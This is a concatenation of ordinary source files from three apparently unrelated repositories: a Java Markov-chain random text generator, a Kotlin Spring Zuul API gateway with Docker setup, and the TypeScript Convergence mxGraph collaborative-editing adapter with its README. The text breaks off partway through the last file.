bf8bace66bead002d863b1c1a0870eea92ef5c5b
530a5ce2aa6f5818f106ef637e32d073519ff864
refs/heads/master
<file_sep>import java.util.*; import static java.lang.System.out; /** * Write a description of MarkovModelGeneral here. * * @author (your name) * @version (a version number or a date) */ public class MarkovModelGeneralEfficient extends AbstractMarkovModel { public MarkovModelGeneralEfficient(int num){ myRandom = new Random(); order = num; myDict = new HashMap<String, ArrayList<Character>>(); } public void setTraining(String s){ myText = s.trim(); } public HashMap<String, ArrayList<Character>> getDict(){ HashMap<String, ArrayList<Character>> resDict = myDict; return resDict; } public void buildMap(){ for (int i = 0; i<=myText.length()-order; i++){ String key = myText.substring(i, i+order); ArrayList<Character> prevList = myDict.get(key); int ind = i; if (prevList == null){ ArrayList<Character> newList = new ArrayList<Character>(); if (i==myText.length()-order){ myDict.put(key, newList); } else { char followsChar = myText.charAt(ind+order); newList.add(followsChar); while (ind != -1){ ind = myText.indexOf(key, ind+1); if (ind != -1){ newList.add(myText.charAt(ind+order)); } } myDict.put(key, newList ); } } } } public String getRandomText(int numChars) { if (myText == null){ return ""; } StringBuilder result = new StringBuilder(); int firstInd = myRandom.nextInt(myText.length()-order); String firstPart = myText.substring(firstInd, firstInd + order); result.append(firstPart); buildMap(); printHashMapInfo(); String key = firstPart; for (int i = 0; i<numChars-order; i++){ ArrayList<Character> followsList = myDict.get(key); if (followsList != null){ //this step is in getFollows() method //int listInd = myRandom.nextInt(followsList.size()-1); String tempKey = ""; ArrayList<Character> nextList = new ArrayList<Character>(); int counter = 0; while (nextList==null||nextList.size()==0){ char tempChar = getFollows(key); result.append(tempChar); tempKey = result.substring(result.length()-order); nextList = myDict.get(tempKey); result.deleteCharAt(result.length()-1); if 
(counter==1&&nextList == null||counter==1&&nextList.size()==0){return result.toString();} if (nextList!=null){ char nextChar = tempChar; key=tempKey; result.append(nextChar); } counter++; } } } return result.toString(); } public void printHashMapInfo(){ /* for ( Object pair : myDict.entrySet()){ out.println(pair); } */ out.println("Keys: " + myDict.size()); } } <file_sep>------------------------------------------------------------------------ PROJECT TITLE: Markov Random Text By Letter ------------------------------------------------------------------------ PURPOSE OF PROJECT: Implement Markov based on n-letters VERSION or DATE: 10/31/2017 HOW TO START THIS PROJECT: TBH Idk outside of BlueJ AUTHORS: <NAME> USER INSTRUCTIONS: (Requires import edu.duke.*) available at http://www.dukelearntoprogram.com/downloads/bluej.php?course=2
1bd8b49dae7aab7ae09b878e20762046374e2a65
[ "Java", "Text" ]
2
Java
aquaday47/Markov-RandomText-Letter
96bb27f917aeb7bae831360f93ddbc19f4805e0e
f3ee158c5621469cfabdfbb64cb8cf8959cb56df
refs/heads/master
<file_sep>FROM java:8 MAINTAINER <EMAIL> WORKDIR /apps/api-gateway COPY build/libs/api-gateway-*.jar /apps/api-gateway/api-gateway.jar EXPOSE 8080 CMD java -jar api-gateway.jar<file_sep>package com.softeam.gateway import org.springframework.boot.SpringApplication import org.springframework.boot.autoconfigure.SpringBootApplication import org.springframework.cloud.netflix.zuul.EnableZuulProxy import org.springframework.web.servlet.config.annotation.EnableWebMvc import org.springframework.web.servlet.config.annotation.ResourceHandlerRegistry import org.springframework.web.servlet.config.annotation.WebMvcConfigurerAdapter @EnableZuulProxy @SpringBootApplication open class GatewayApplication : WebMvcConfigurerAdapter() fun main(args: Array<String>) { SpringApplication.run(GatewayApplication::class.java, *args) }<file_sep>server.contextPath=/ server.port=8080 zuul.routes.helloworld.url=http://${helloworld_ingress_url:helloworld-ingress} <file_sep>version: '3.2' services: api-gateway: image: "registry.k8.wildwidewest.xyz/repository/docker-repository/api-gateway:${tag}" build: .
a62dbfefff92b6c5aced662a0473b17139b0549e
[ "Kotlin", "Dockerfile", "YAML", "INI" ]
4
Dockerfile
Helloworld-K8s/api-gateway
9572428f12f49178ccd75ff926e1a8249b59df9f
9f1df6c589e0c9411897d74c172cb0a17dc492ee
refs/heads/master
<file_sep>import { ObjectRemoveEvent, ObjectSetEvent, RealTimeObject } from "@convergence/convergence"; import {mxCell, mxChildChange, mxEvent, mxGraph, mxRootChange} from "mxgraph"; import {Deserializer, Serializer} from "./"; import {MxCellAdapter} from "./MxCellAdapter"; interface IMxCellsAdded { properties: { cells: mxCell[] }; } interface IMxCellsRemoved { properties: { cells: mxCell[] }; } export class MxGraphAdapter { private static readonly _CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; private static readonly _ID_LENGTH = 32; private static _generateId() { let text = ""; for (let i = 0; i < MxGraphAdapter._ID_LENGTH; i++) { text += MxGraphAdapter._CHARS.charAt(Math.floor(Math.random() * MxGraphAdapter._CHARS.length)); } return text; } private readonly _mxGraph: mxGraph; private readonly _rtCells: RealTimeObject; private readonly _listeners: any[]; private readonly _cellAdapters: Map<mxCell, MxCellAdapter>; constructor(graph: mxGraph, rtGraph: RealTimeObject) { this._mxGraph = graph; this._rtCells = rtGraph.get("cells") as RealTimeObject; this._listeners = []; this._cellAdapters = new Map(); // Listen for local changes this._mxGraph.addListener(mxEvent.CELLS_ADDED, (_: any, evt: IMxCellsAdded) => this._handleLocalCellsAdded(evt)); this._mxGraph.addListener(mxEvent.CELLS_REMOVED, (_: any, evt: IMxCellsRemoved) => this._handleLocalCellsRemoved(evt)); this._mxGraph.model.addListener(mxEvent.CHANGE, (_: any, evt: any) => { const edit = evt.getProperty("edit"); edit.changes.forEach((change: any) => this._processLocalChange(change)); }); // Listen for remote changes this._rtCells.on("set", (e: ObjectSetEvent) => this._handleRemoteCellAdded(e)); this._rtCells.on("remove", (e: ObjectRemoveEvent) => this._handleRemoteCellRemoved(e)); Object.keys(this._mxGraph.model.cells).forEach((id: string) => { const cell = this._mxGraph.model.cells[id]; const rtCell = this._rtCells.get(id) as RealTimeObject; this._bindMxCellAdapter(cell, rtCell); }); 
} public addListener(listener: any): void { this._listeners.push(listener); } private _bindMxCellAdapter(mxGraphCell: mxCell, rtCell: RealTimeObject): void { const adapter = new MxCellAdapter(mxGraphCell, rtCell, this._mxGraph, this._fireEvent.bind(this)); this._cellAdapters.set(mxGraphCell, adapter); } private _handleLocalCellsAdded(evt: IMxCellsAdded): void { const {properties} = evt; const cells = properties.cells; cells.forEach((cell: mxCell) => { this._handlePotentiallyNewCell(cell); }); } private _handlePotentiallyNewCell(cell: mxCell): void { if (!cell.id) { const id = MxGraphAdapter._generateId(); this._mxGraph.model.cells[id] = cell; cell.id = id; const cellJson = Serializer.serializeMxCell(cell); const rtCell = this._rtCells.set(cell.id, cellJson) as RealTimeObject; this._bindMxCellAdapter(cell, rtCell); } } private _handleLocalCellsRemoved(evt: IMxCellsRemoved): void { const {properties} = evt; const cells = properties.cells; cells.forEach((cell: mxCell) => { const cellId = cell.id; this._rtCells.remove(cellId); this._cellAdapters.delete(cell); }); this._fireEvent("onCellsRemoved", {cells}); } private _handleRemoteCellAdded(e: ObjectSetEvent): void { const cellId = e.key; const cellJson = e.value.value(); const cell = Deserializer.deserializeMxCell(cellId, cellJson); Deserializer.resolveCellRelationships(cell, cellJson, this._mxGraph.model); this._mxGraph.model.cellAdded(cell); this._mxGraph.view.refresh(); this._bindMxCellAdapter(cell, e.value as RealTimeObject); } private _handleRemoteCellRemoved(e: ObjectRemoveEvent): void { const cellId = e.key; const cell = this._mxGraph.model.cells[cellId]; this._cellAdapters.delete(cell); this._mxGraph.model.remove(cell); this._mxGraph.view.refresh(); this._fireEvent("onCellsRemoved", {cells: [cell]}); } private _processLocalChange(change: any) { if (change instanceof mxRootChange) { if (change.root === this._mxGraph.model.root) { // todo console.warn("unhandled root change"); } } else if (change instanceof 
mxChildChange) { this._processLocalChildChange(change); } else if (change.cell != null && change.cell.id != null) { const adapter = this._cellAdapters.get(change.cell); adapter.processChange(change); } } private _processLocalChildChange(change: mxChildChange) { const {child} = change; if (!child.id) { this._handlePotentiallyNewCell(child); } else { const adapter = this._cellAdapters.get(child); if (adapter) { adapter.processChange(change); } } } private _fireEvent(name: string, evt: any) { this._listeners.forEach((listener: any) => { try { const callback = listener[name]; if (callback) { callback(evt); } } catch (e) { console.log(e); } }); } } <file_sep>import {mxCell, mxGeometry, mxGraphModel, mxPoint} from "mxgraph"; import {ICellData, IGeometry, IModelData, IPoint, IStyleData} from "./MxGraphData"; export class Serializer { public static serializeMxGraphModel(model: mxGraphModel): IModelData { const cells: { [key: string]: any } = {}; Object.keys(model.cells).forEach((cellId: string) => { const cell = model.cells[cellId]; cells[cellId] = Serializer.serializeMxCell(cell); }); const root = model.root.id; return { root, cells }; } public static serializeMxCell(cell: mxCell): ICellData { const result: ICellData = { id: cell.id }; if (cell.style !== undefined) { result.style = Serializer.serializeStyle(cell.style); } if (cell.value !== undefined) { result.value = Serializer.serializeValue(cell.value); } if (cell.geometry !== undefined) { result.geometry = Serializer.serializeGeometry(cell.geometry); } if (cell.connectable !== undefined) { result.connectable = cell.connectable; } if (cell.visible !== undefined) { result.visible = cell.visible; } if (cell.collapsed !== undefined) { result.collapsed = cell.collapsed; } if (cell.edge) { result.edge = true; } if (cell.vertex) { result.vertex = true; } if (cell.parent) { result.parent = cell.parent.id; } if (cell.source) { result.source = cell.source.id; } if (cell.target) { result.target = cell.target.id; } return result; 
} public static serializeGeometry(geometry: mxGeometry): IGeometry { const result: IGeometry = { x: geometry.x, y: geometry.y, width: geometry.width, height: geometry.height }; if (geometry.points) { result.points = geometry.points.map((p: mxPoint) => Serializer.serializeMxPoint(p)); } if (geometry.sourcePoint) { result.sourcePoint = Serializer.serializeMxPoint(geometry.sourcePoint); } if (geometry.targetPoint) { result.targetPoint = Serializer.serializeMxPoint(geometry.targetPoint); } if (geometry.relative !== undefined) { result.relative = geometry.relative; } if (geometry.offset) { result.offset = Serializer.serializeMxPoint(geometry.offset); } return result; } public static serializeMxPoint(geometry: mxPoint): IPoint { return { x: geometry.x, y: geometry.y }; } public static serializeStyle(style: string): IStyleData { const result: IStyleData = { classes: [], styles: {} }; if (style) { const styles = style.split(";"); styles.forEach((s) => { if (s.includes("=")) { const [key, value] = s.split("="); result.styles[key] = value; } else if (s.trim().length > 0) { result.classes.push(s); } }); } return result; } public static serializeValue(value: any): any { // TODO handle an xml node. 
return value; } } <file_sep>export interface IModelData { cells: {[key: string]: ICellData}; root: string; } export interface ICellData { id: string; geometry?: IGeometry; style?: IStyleData; value?: any; vertex?: boolean; edge?: boolean; collapsed?: boolean; visible?: boolean; connectable?: boolean; parent?: string; source?: string; target?: string; } export interface IPoint { x: number; y: number; } export interface IRectangle extends IPoint { x: number; y: number; height: number; width: number; } export interface IGeometry extends IRectangle { x: number; y: number; height: number; width: number; points?: IPoint[]; sourcePoint?: IPoint; targetPoint?: IPoint; relative?: boolean; offset?: IPoint; } export interface IStyleData { styles: {[key: string]: any}; classes: string[]; } <file_sep>import { Activity, ActivityParticipant, ActivitySessionJoinedEvent, ActivitySessionLeftEvent, ActivityStateRemovedEvent, ActivityStateSetEvent } from "@convergence/convergence"; import {mxGraph} from "mxgraph"; import {ActivityColorManager} from "./ActivityColorManager"; export class PointerManager { private static _SVG_NS = "http://www.w3.org/2000/svg"; private static _CURSOR_PATH = "M 0,0 L 0,0 11.6,11.6 6.7,11.6 9.6,18.3 6.0,20.2 3.1,13.3 0,16z"; private static _POINTER_KEY = "pointer"; private readonly _mxGraph: mxGraph; private readonly _activity: Activity; private readonly _colorManager: ActivityColorManager; private readonly _remotePointers: Map<string, HTMLElement>; private readonly _root: SVGElement; private _active: boolean; constructor(graph: mxGraph, activity: Activity, colorManager: ActivityColorManager) { this._mxGraph = graph; this._activity = activity; this._colorManager = colorManager; this._remotePointers = new Map(); this._root = this._mxGraph.view.getOverlayPane() as any as SVGElement; this._active = true; this._listenToGraph(); this._listenToActivity(); this._activity.participants().forEach((participant: ActivityParticipant) => { 
this._addRemotePointer(participant); }); } private _listenToGraph(): void { this._root.ownerSVGElement.addEventListener("mouseleave", () => { this._activity.removeState(PointerManager._POINTER_KEY); this._active = false; }); this._root.ownerSVGElement.addEventListener("mouseenter", () => { this._active = true; }); this._mxGraph.addMouseListener({ mouseDown: () => { // No-Op }, mouseMove: (_: any, evt: any) => { if (this._active) { const {graphX, graphY} = evt; const scale = this._mxGraph.view.scale; const translate = this._mxGraph.view.translate; const tX = Math.round((graphX - translate.x * scale) / scale); const tY = Math.round((graphY - translate.y * scale) / scale); const pointerState = {x: tX, y: tY}; this._activity.setState(PointerManager._POINTER_KEY, pointerState); } }, mouseUp: () => { // Click animation. } }); } private _listenToActivity(): void { this._activity.on("session_joined", (e: ActivitySessionJoinedEvent) => { this._addRemotePointer(e.participant); }); this._activity.on("session_left", (e: ActivitySessionLeftEvent) => { const remotePointer = this._remotePointers.get(e.sessionId); remotePointer.parentElement.removeChild(remotePointer); this._remotePointers.delete(e.sessionId); }); this._activity.on("state_set", (e: ActivityStateSetEvent) => { const {key, value, sessionId, local} = e; if (!local && key === PointerManager._POINTER_KEY) { const remotePointer = this._remotePointers.get(sessionId); const scale = this._mxGraph.view.scale; const translate = this._mxGraph.view.translate; const graphX = Math.round((value.x + translate.x) * scale); const graphY = Math.round((value.y + translate.y) * scale); remotePointer.setAttributeNS(null, "transform", `translate(${graphX},${graphY})`); remotePointer.setAttributeNS(null, "visibility", "visible"); } }); this._activity.on("state_removed", (e: ActivityStateRemovedEvent) => { const {key, sessionId, local} = e; if (!local && key === "pointer") { const remotePointer = this._remotePointers.get(sessionId); 
remotePointer.setAttributeNS(null, "visibility", "hidden"); } }); } private _addRemotePointer(participant: ActivityParticipant): void { if (!participant.local) { const pointer = participant.state.get(PointerManager._POINTER_KEY) || {x: 0, y: 0}; const remotePointer = document.createElementNS(PointerManager._SVG_NS, "path"); remotePointer.setAttributeNS(null, "d", PointerManager._CURSOR_PATH); remotePointer.setAttributeNS(null, "transform", `translate(${pointer.x},${pointer.y})`); const color = this._colorManager.color(participant.sessionId); remotePointer.setAttributeNS(null, "fill", color); remotePointer.setAttributeNS(null, "stroke", color); this._remotePointers.set(participant.sessionId, remotePointer as HTMLElement); this._root.appendChild(remotePointer); if (!participant.state.has(PointerManager._POINTER_KEY)) { remotePointer.setAttributeNS(null, "visibility", "hidden"); } } } } <file_sep>import {ColorAssigner} from "@convergence/color-assigner"; import { Activity, ActivitySessionJoinedEvent, ActivitySessionLeftEvent, IConvergenceEvent } from "@convergence/convergence"; import {filter} from "rxjs/operators"; export class ActivityColorManager { private readonly _colorAssigner: ColorAssigner; constructor(activity: Activity, palette?: string[]) { this._colorAssigner = new ColorAssigner(palette); activity.events() .pipe(filter((e: IConvergenceEvent) => e.name === "session_joined")) .subscribe((e: ActivitySessionJoinedEvent) => { this._addSession(e.sessionId); }); activity.events() .pipe(filter((e: IConvergenceEvent) => e.name === "session_left")) .subscribe((e: ActivitySessionLeftEvent) => { this._removeSession(e.sessionId); }); } public color(sessionId: string): string { return this._colorAssigner.getColorAsHex(sessionId); } private _addSession(sessionId: string): void { this._colorAssigner.getColor(sessionId); } private _removeSession(sessionId: string): void { this._colorAssigner.releaseColor(sessionId); } } <file_sep>/* tslint:disable:class-name 
max-classes-per-file */ declare module "mxgraph" { export class mxEventSource { public addListener(name: string, callback: (sender: any, evt: any) => void): void; } export class mxGraphModel extends mxEventSource { public root: mxCell; public createIds: boolean; public cells: { [key: string]: mxCell }; public setRoot(cell: mxCell): void; public cellAdded(cell: mxCell): void; public remove(cell: mxCell): mxCell; } export class mxGraph extends mxEventSource { public model: mxGraphModel; public root: mxCell; public view: mxGraphView; public selectionCellsHandler: mxSelectionCellsHandler; public addMouseListener(listener: any): void; public getSelectionCells(): mxCell[]; } export class mxGraphView extends mxEventSource { public scale: number; public translate: mxPoint; public getState(cell: mxCell): mxCellState; public refresh(): void; public removeState(cell: mxCell): void; public getOverlayPane(): HTMLElement; } export class mxCellState { } export class mxCell extends mxEventSource { public id: string; public style: string; public value: any; public edge: any; public vertex: any; public visible: boolean; public collapsed: boolean; public connectable: boolean; public parent: mxCell | null; public source: mxCell | null; public target: mxCell | null; public geometry: mxGeometry; constructor(value?: any, geometry?: mxGeometry, style?: string); public insert(child: mxCell, index?: number): mxCell; public insertEdge(edge: mxCell, isOutgoing: boolean): mxCell; public setParent(parent: mxCell): void; public setTerminal(terminal: mxCell, source: boolean): void; public setStyle(style: string): void; public setValue(valud: any): void; public setGeometry(geometry: mxGeometry): void; public setCollapsed(collapsed: boolean): void; public setConnectable(connectable: boolean): void; public setEdge(edge: boolean): void; public setVertex(vertex: boolean): void; public setVisible(visible: boolean): void; } export class mxSelectionCellsHandler extends mxEventSource { public 
getHandler(cell: mxCell): any; } export const mxEvent: { ADD: string; CHANGE: string; CELLS_ADDED: string; CELLS_REMOVED: string; REMOVE: string; }; export class mxRootChange { public root: mxCell; } export class mxChildChange { public model: mxGraphModel; public parent: mxCell | null; public previous: mxCell | null; public child: mxCell; public index: number; public previousIndex: number; } export class mxTerminalChange { public model: mxGraphModel; public cell: mxCell; public terminal: mxCell | null; public source: boolean; public previous: mxCell | null; } export class mxGeometryChange { public model: mxGraphModel; public cell: mxCell; public geometry: any; public previous: any; } export class mxStyleChange { public model: mxGraphModel; public cell: mxCell; public style: string; public previous: string; } export class mxValueChange { public model: mxGraphModel; public cell: mxCell; public value: any; public previous: any; } export class mxCollapseChange { public model: mxGraphModel; public cell: mxCell; public collapsed: boolean; public previous: boolean; } export class mxVisibleChange { public model: mxGraphModel; public cell: mxCell; public visible: boolean; public previous: boolean; } export class mxPoint { public x: number; public y: number; constructor(x?: number, y?: number); } export class mxRectangle extends mxPoint { public height: number; public width: number; constructor(x?: number, y?: number, width?: number, height?: number); } export class mxGeometry extends mxRectangle { public points: mxPoint[]; public relative: boolean; public sourcePoint?: mxPoint; public targetPoint?: mxPoint; public offset: mxPoint; constructor(x?: number, y?: number, width?: number, height?: number); public setTerminalPoint(point: any, isSource: any): any; } export class mxCellHighlight { constructor(graph: mxGraph, highlightColor: string, strokeWidth: number, dashed: boolean); public highlight(cell: mxCellState | null): void; public destroy(): void; } export class 
mxVertexHandler { public redraw(): void; } export class mxEdgeHandler { public redraw(): void; } } <file_sep><img src="https://convergence.io/assets/img/convergence-logo.png" height="75" /> # Convergence mxGraph Adapter [![example workflow](https://github.com/convergencelabs/mxgraph-adapter/actions/workflows/build.yml/badge.svg)](https://github.com/convergencelabs/mxgraph-adapter/actions/workflows/build.yml) The **Convergence mxGraph Adapter** makes it easy to provide a collaborative diagram editing experience using [mxGraph](https://github.com/jgraph/mxgraph) and [Convergence](https://convergence.io). This adapter provides shared editing of graph data along with shared pointers and selection. A live example, as part of the Convergence Examples, can be found [here](https://examples.convergence.io/examples/mxgraph/). This project also forms the basis of the [mxGraph Graph Editor Demo](https://github.com/convergencelabs/mxgraph-demo). ## Installation Install package with NPM and add it to your development dependencies: ```npm install --save-dev @convergence/mxgraph-adapter``` ## Building * `npm install` * `npm run dist` ## Run the Example * `npm install` * `npm run dist` * Update the configuration as described in `examples/config.example.js`. * `npm start` * Browse to `http://localost:4100` ## Usage The following HTML creates a container element for mxGraph. The full code can be seen in the [Example](./example). ```html <div id="mxgraph" style="height: 400px; width: 600px"></div> ``` The following JavaScript code will initialze a collaborative graph. 
```JavaScript const { ActivityColorManager, MxGraphAdapter, PointerManager, SelectionManager, Deserializer } = ConvergenceMxGraphAdapter; Convergence .connectAnonymously(CONVERGENCE_URL, "test user") .then(domain => { const model = domain .models() .openAutoCreate({ id: "mxgrph-example", collection: "mxgraph", ephemeral: true, data: () => { return DEFAULT_GRAPH; } }); const activity = domain .activities() .join("mxgraph-example"); return Promise.all([model, activity]); }) .then(([model, activity]) => { const container = document.getElementById("mxgraph"); const graphModel = Deserializer.deserializeMxGraphModel(model.root().value()); const graph = new mxGraph(container, graphModel); setTimeout(() => { const colorManger = new ActivityColorManager(activity); const graphAdapter = new MxGraphAdapter(graph, model.root()); const pointerManager = new PointerManager(graph, activity, colorManger); const selectionManager = new SelectionManager(graph, activity, colorManger, graphAdapter); }, 0); }); ``` <file_sep># Change Log ## [v0.1.0](https://github.com/convergencelabs/,graph-adapter/tree/0.1.0) (2019-03-24) - Initial release. 
<file_sep>import {mxCell, mxGeometry, mxGraphModel, mxPoint} from "mxgraph";
import { ICellData, IGeometry, IModelData, IPoint, IStyleData } from "./MxGraphData";

/**
 * Rebuilds live mxGraph objects from their serialized JSON representation
 * (the inverse of Serializer).
 */
export class Deserializer {

  /**
   * Builds a complete mxGraphModel from model JSON.
   *
   * Cells are created in two passes: first every cell object, then the
   * parent/source/target links — a relationship may reference a cell that
   * has not been instantiated yet, so links cannot be wired on the fly.
   */
  public static deserializeMxGraphModel(json: IModelData): mxGraphModel {
    const cells = {...json.cells};
    const rootJson = cells[json.root];
    delete cells[json.root];
    const rootCell = Deserializer.deserializeMxCell(json.root, rootJson);
    const model = new mxGraphModel();
    // Ids come from the shared model; mxGraph must not mint its own.
    model.createIds = false;
    model.setRoot(rootCell);
    Object.keys(cells).forEach((cellId) => {
      const cellJson = cells[cellId];
      const cell = Deserializer.deserializeMxCell(cellId, cellJson);
      model.cellAdded(cell);
    });
    Object.keys(cells).forEach((cellId) => {
      const cell = model.cells[cellId];
      const cellData = cells[cellId];
      Deserializer.resolveCellRelationships(cell, cellData, model);
    });
    return model;
  }

  /**
   * Creates a single mxCell (without parent/terminal links) from cell JSON.
   */
  public static deserializeMxCell(id: string, cellData: ICellData): mxCell {
    const value = Deserializer.deserializeValue(cellData.value);
    const style = Deserializer.deserializeStyle(cellData.style);
    const geometry = Deserializer.deserializeGeometry(cellData.geometry);
    const cell = new mxCell(value, geometry, style);
    cell.id = id;
    if (cellData.collapsed !== undefined) {
      cell.setCollapsed(cellData.collapsed);
    }
    if (cellData.connectable !== undefined) {
      cell.setConnectable(cellData.connectable);
    }
    if (cellData.visible !== undefined) {
      cell.setVisible(cellData.visible);
    }
    if (cellData.vertex === true) {
      cell.setVertex(true);
    }
    if (cellData.edge === true) {
      cell.setEdge(true);
    }
    if (cellData.style !== undefined) {
      // NOTE(review): style was already passed to the constructor above;
      // this second setStyle call looks redundant — confirm before removing.
      cell.setStyle(Deserializer.deserializeStyle(cellData.style));
    }
    return cell;
  }

  /**
   * Second pass: wires a cell to its parent and edge terminals by id,
   * assuming all referenced cells already exist in the model.
   */
  public static resolveCellRelationships(
    cell: mxCell,
    cellData: ICellData,
    model: mxGraphModel): void {
    if (cellData.parent) {
      const parent = model.cells[cellData.parent];
      parent.insert(cell);
    }
    if (cellData.source) {
      const source = model.cells[cellData.source];
      source.insertEdge(cell, true);
    }
    if (cellData.target) {
      const target = model.cells[cellData.target];
      target.insertEdge(cell, false);
    }
  }

  /** Currently a pass-through; values are stored as plain JSON. */
  public static deserializeValue(jsonValue: any): any {
    // TODO handle an xml node.
    return jsonValue;
  }

  /**
   * Converts style JSON ({classes, styles}) back into the mxGraph
   * "class1;class2;key=value;" string form. Returns undefined when no
   * style was serialized.
   */
  public static deserializeStyle(jsonStyle: IStyleData): string {
    if (jsonStyle === undefined) {
      return;
    }
    let style = "";
    jsonStyle.classes.forEach((className: string) => {
      style += className + ";";
    });
    Object.keys(jsonStyle.styles).forEach((key: string) => {
      const value = jsonStyle.styles[key];
      style += key + "=" + value + ";";
    });
    return style;
  }

  /** Converts geometry JSON (bounds, waypoints, terminal/offset points) to mxGeometry. */
  public static deserializeGeometry(geom: IGeometry): mxGeometry {
    if (!geom) {
      return;
    }
    const result = new mxGeometry(geom.x, geom.y, geom.width, geom.height);
    if (geom.points) {
      result.points = geom.points.map((p: IPoint) => Deserializer.deserializePoint(p));
    }
    if (geom.sourcePoint) {
      result.setTerminalPoint(Deserializer.deserializePoint(geom.sourcePoint), true);
    }
    if (geom.targetPoint) {
      result.setTerminalPoint(Deserializer.deserializePoint(geom.targetPoint), false);
    }
    result.relative = geom.relative;
    if (geom.offset) {
      result.offset = Deserializer.deserializePoint(geom.offset);
    }
    return result;
  }

  /** Converts point JSON to an mxPoint. */
  public static deserializePoint(jsonPoint: IPoint): mxPoint {
    return new mxPoint(jsonPoint.x, jsonPoint.y);
  }
}
<file_sep>export * from "./ActivityColorManager";
export * from "./MxGraphAdapter";
export * from "./PointerManager";
export * from "./SelectionManager";
export * from "./Deserializer";
export * from "./Serializer";
<file_sep>import {
  ArrayInsertEvent,
  ArrayRemoveEvent,
  ObjectRemoveEvent,
  ObjectSetEvent,
  RealTimeArray,
  RealTimeObject
} from "@convergence/convergence";
import {
  mxCell,
  mxChildChange,
  mxCollapseChange,
  mxGeometryChange,
  mxGraph,
  mxStyleChange,
  mxTerminalChange,
  mxValueChange,
  mxVisibleChange
} from "mxgraph";
import {Deserializer, Serializer} from "./";
import {IGeometry, IStyleData} from "./MxGraphData";

/** Result of diffing two serialized styles. */
interface IStyleDiffs {
  addedClasses: string[];
  removedClasses: string[];
  changedStyles: {[key: string]: any};
}

/**
 * Two-way adapter between a single mxCell and its RealTimeObject in the
 * shared Convergence model: local mxGraph changes are written to the
 * real-time cell, and remote real-time events are applied back to the cell.
 */
export class MxCellAdapter {
  private readonly _mxCell: mxCell;
  private readonly _mxGraph: mxGraph;
  private readonly _rtCell: RealTimeObject;
  private readonly _rtGeometry: RealTimeObject;
  private readonly _eventCallback: (event: string, value: any) => void;
  private _rtStyle: RealTimeObject | null;
  private _rtStyles: RealTimeObject | null;
  private _rtClasses: RealTimeArray | null;

  constructor(cell: mxCell, rtCell: RealTimeObject, graph: mxGraph, eventEmitter: () => void) {
    this._mxCell = cell;
    this._rtCell = rtCell;
    this._mxGraph = graph;
    this._eventCallback = eventEmitter;
    this._rtGeometry = null;
    this._initCell();
    this._rtGeometry = this._initRtGeometry();
    this._initStyle();
  }

  /** Dispatches a local mxGraph edit to the matching real-time update. */
  public processChange(change: any): void {
    if (change instanceof mxTerminalChange) {
      this._localTerminalChanged(change);
    } else if (change instanceof mxGeometryChange) {
      this._localGeometryChanged(change);
    } else if (change instanceof mxStyleChange) {
      this._localStyleChanged(change);
    } else if (change instanceof mxValueChange) {
      this._localValueChanged(change);
    } else if (change instanceof mxCollapseChange) {
      this._localCollapsedChanged(change);
    } else if (change instanceof mxVisibleChange) {
      this._localVisibleChanged(change);
    } else if (change instanceof mxChildChange) {
      this._localChildChange(change);
    }
  }

  private _localGeometryChanged(change: mxGeometryChange): void {
    const {geometry} = change;
    const geometryJson = Serializer.serializeGeometry(geometry);
    this._rtGeometry.value(geometryJson);
    this._eventCallback("onCellChanged", {cell: this._mxCell});
  }

  private _localCollapsedChanged(change: mxCollapseChange): void {
    const {collapsed} = change;
    this._rtCell.set("collapsed", collapsed);
    this._eventCallback("onCellChanged", {cell: this._mxCell});
  }

  private _localVisibleChanged(change: mxVisibleChange): void {
    const {visible} = change;
    this._rtCell.set("visible", visible);
    this._eventCallback("onCellChanged", {cell: this._mxCell});
  }

  private _localValueChanged(change: mxValueChange): void {
    const {value} = change;
    this._rtCell.set("value", value);
    this._eventCallback("onCellChanged", {cell: this._mxCell});
  }

  private _localTerminalChanged(change: mxTerminalChange): void {
    const {source, terminal, previous} = change;
    // mxTerminalChange covers both ends; `source` says which one moved.
    const prop = source ? "source" : "target";
    if (terminal !== previous) {
      const value = terminal !== null ? terminal.id : null;
      this._rtCell.set(prop, value);
    }
    this._eventCallback("onCellChanged", {cell: this._mxCell});
  }

  private _localStyleChanged(change: mxStyleChange): void {
    const {previous, style} = change;
    const oldStyle = Serializer.serializeStyle(previous);
    const newStyle = Serializer.serializeStyle(style);
    // check for lazy style initialization
    if (!this._rtStyle) {
      this._rtCell.set("style", newStyle);
      this._initStyle();
    } else {
      const diff = this._diffStyles(newStyle, oldStyle);
      this._applyStyleChanges(diff);
    }
    this._eventCallback("onCellChanged", {cell: this._mxCell});
  }

  private _diffStyles(newStyles: any, oldStyles: any): IStyleDiffs {
    // FIX: added classes are those NOT present in the old style (indexOf < 0).
    // The previous `>= 0` selected classes common to both, so newly added
    // classes were never propagated (and unchanged ones were re-pushed).
    const addedClasses = newStyles.classes.filter((c: string) => oldStyles.classes.indexOf(c) < 0);
    const removedClasses = oldStyles.classes.filter((c: string) => newStyles.classes.indexOf(c) < 0);
    const changedStyles: any = {};
    // Process all new styles
    for (const styleName in newStyles.styles) {
      if (newStyles.styles.hasOwnProperty(styleName)) {
        const newValue = newStyles.styles[styleName];
        const oldValue = oldStyles.styles[styleName];
        if (newValue !== oldValue) {
          changedStyles[styleName] = newValue;
        }
      }
    }
    // look for removed styles; null marks a key for deletion downstream
    for (const styleName in oldStyles.styles) {
      if (typeof newStyles.styles[styleName] === "undefined") {
        changedStyles[styleName] = null;
      }
    }
    return {addedClasses, removedClasses, changedStyles};
  }

  /** Applies a style diff to the real-time model as one batched operation. */
  private _applyStyleChanges(styleDiff: IStyleDiffs): void {
    this._rtStyle.model().startBatch();
    styleDiff.removedClasses.forEach((c) => {
      const oldClasses = this._rtClasses.value();
      const index = oldClasses.indexOf(c);
      this._rtClasses.remove(index);
    });
    styleDiff.addedClasses.forEach((c) => {
      this._rtClasses.push(c);
    });
    for (const styleName in styleDiff.changedStyles) {
      if (styleDiff.changedStyles.hasOwnProperty(styleName)) {
        const newValue = styleDiff.changedStyles[styleName];
        if (newValue !== null) {
          this._rtStyles.set(styleName, newValue);
        } else {
          this._rtStyles.remove(styleName);
        }
      }
    }
    this._rtStyle.model().endBatch();
  }

  private _localChildChange(change: mxChildChange): void {
    const {parent} = change;
    this._rtCell.set("parent", parent === null ? null : parent.id);
    this._eventCallback("onCellChanged", {cell: this._mxCell});
  }

  /** Subscribes to remote property changes and applies them to the mxCell. */
  private _initCell() {
    this._rtCell.on("set", (e: ObjectSetEvent) => {
      switch (e.key) {
        case "parent":
          const parentId = e.value.value();
